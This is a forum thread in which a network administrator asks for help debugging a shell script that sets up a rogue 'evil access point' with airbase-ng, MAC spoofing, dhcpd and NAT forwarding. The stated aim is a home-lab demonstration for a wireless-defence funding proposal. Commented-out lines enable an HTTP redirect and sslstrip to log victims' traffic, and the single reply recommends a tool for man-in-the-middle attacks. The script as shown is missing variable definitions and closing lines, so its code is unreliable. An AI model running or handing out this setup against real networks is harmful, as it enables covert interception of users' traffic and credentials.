Results 1 to 2 of 2

Thread: issue with setting up an "evil access point" script.

  1. #1
    Join Date

    issue with setting up an "evil access point" script.

    I've demoed some of the tools on Kali with my management in order to get funding for new pieces of hardware and software to combat "rogue elements" on the corporate network. Right now I'm working on a proposal to fund the purchase of Motorola AirDefense and as part of this I'm trying to set up a simple "evil access point". I'm working in my home lab ATM and am having issues with the script for this.

    (I prefer to use shell scripts over GUI tools because the management seems to respond better to seeing text fly by instead of GUI tools... go figure).

    A while back I tried doing this under Backtrack, but couldn't get it working quite right. I dug up the old script I was working with, which IIRC was either one I downloaded or something hacked together from different scripts, but either way I never got it working right.

    Trying this on Kali 2 and I've made some changes from the original script

    #____[start of config]_________________________
    # these two values can be overwritten using 
    # arguments to the command
    #____[end of config]___________________________
    # override the default essid if one is provided
    if [[ ! -z ${1} ]]; then
    # override the default channel if one is provided
    if [[ ! -z ${2} ]]; then
    function clear_iptables {
        iptables --flush
        iptables --table nat --flush
        iptables --table nat --delete-chain
        iptables --delete-chain
    function cleanup {
        echo "* cleaning up"
        killall sslstrip
        killall dhcpd
        rm -rf /tmp/dhcpd
        rm -f /tmp/dhcpd.conf
        ifconfig at0 down
        killall airbase-ng
        echo "* end of script"
        exit 0
    trap cleanup INT
    echo "* creating dummy dhcpd.conf"
    cat << EOF > /tmp/dhcpd.conf
    ddns-update-style standard;
    default-lease-time 600;
    max-lease-time 7200;
    subnet ${subnet} netmask ${netmask} {
        option subnet-mask ${netmask};
        option broadcast-address ${broadcast};
        option routers ${router};
        option domain-name-servers ${dns}; 
        range ${startip} ${endip};
    echo "* starting airbase-ng essid ${essid} on channel ${channel}"
    airbase-ng -e "${essid}" -q -c ${channel} wlan0mon &
    sleep 3
    echo "* spoofing MAC address for at0"
    ifconfig at0 down
    macchanger -m 00:17:3F:03:13:37 at0
    echo "* bringing up at0 and setting route"
    ifconfig at0 up
    ifconfig at0 ${router} netmask ${netmask}
    route add -net ${subnet} netmask ${netmask} gw ${router}
    echo "* starting dhcpd"
    mkdir -p /tmp/dhcpd
    touch /tmp/dhcpd/dhcpd.leases
    chown -R dhcpd:dhcpd /tmp/dhcpd
    dhcpd -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/ -lf /tmp/dhcpd/dhcpd.leases at0
    echo "* setting up forwarding rules"
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    # mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
    # echo "* using ${mygw} as gateway"
    # iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}
    # iptables -t nat -D PREROUTING 1
    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    echo 1 > /proc/sys/net/ipv4/ip_forward
    # uncomment these two lines to turn on sslstrip
    # echo "* starting sslstrip and logging results to log.txt"
    # sslstrip -f -k -w log.txt &
    echo "* setup complete, now we wait for connections"
    echo "* enter CTRL-C to quit and cleanup"
    while :; do
        sleep 60
    I can't pinpoint where this is going wrong. I can connect to the AP, but I'm not receiving an IP address via dhcp. I want to be able to connect to the AP and have internet access through it for any client connected to it to simulate a person standing up an malicious AP where the victim is completely unaware that they're at risk of being compromised. It also serves to strengthen my argument against our guest network being wide open so I can clamp down on unfettered access to it.
    Last edited by parsec; 2015-11-17 at 19:45.

  2. #2
    Join Date
    I didn't look at your script but this tool might be easier to use
    And you can mitm with this

Similar Threads

  1. Replies: 0
    Last Post: 2022-04-14, 02:30

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts